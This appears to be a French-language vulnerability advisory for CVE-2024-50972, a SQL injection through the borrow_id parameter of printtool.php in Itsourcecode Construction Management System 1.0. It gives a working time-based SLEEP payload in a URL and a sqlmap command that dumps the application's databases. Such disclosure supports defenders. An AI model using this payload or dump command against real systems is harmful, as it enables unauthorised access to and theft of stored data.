CVE-2024-50972
Description
Une vulnérabilité d'injection SQL dans printtool.php de Itsourcecode Construction Management System 1.0 permet à des attaquants distants d'exécuter des commandes SQL arbitraires via le paramètre borrow_id.
Type de vulnérabilité
Injection SQL
Fournisseur du produit
Itsourcecode
Base de code du produit concerné :
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
Composant concerné :
Le système de gestion de construction Itsourcecode v1.0 est vulnérable à l'injection SQL via le paramètre borrow_id dans la page printtool.php
Vecteurs d'attaque :
- Configurez l'application localement et connectez-vous avec les identifiants admin : admin
- Accédez à l'URL suivante dans votre navigateur :
http://localhost/monitoring_system/printtool.php?borrow_id=5
- Injectez la charge utile SQL :
Modifiez le paramètre borrow_id dans l'URL pour inclure une charge utile d'injection SQL temporelle.
http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
- Observez la réponse de l'application :
La page devrait prendre significativement plus de temps (20 secondes) à charger si l'injection réussit, confirmant que le paramètre borrow_id est vulnérable à l'injection SQL.
- Utilisez maintenant l'outil SQLMap pour une exploitation plus poussée et le dump des bases de données à l'aide de la commande ci-dessous :
sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
Référence :
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection